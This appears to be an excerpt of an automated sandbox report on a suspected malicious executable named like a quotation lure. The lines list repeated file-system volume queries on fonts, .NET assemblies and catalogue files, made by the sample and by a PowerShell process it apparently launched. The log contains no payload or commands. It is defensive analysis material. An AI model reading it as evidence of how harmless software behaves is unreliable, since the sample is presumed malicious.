                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Users\user\Desktop\rQuotation3200025006.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
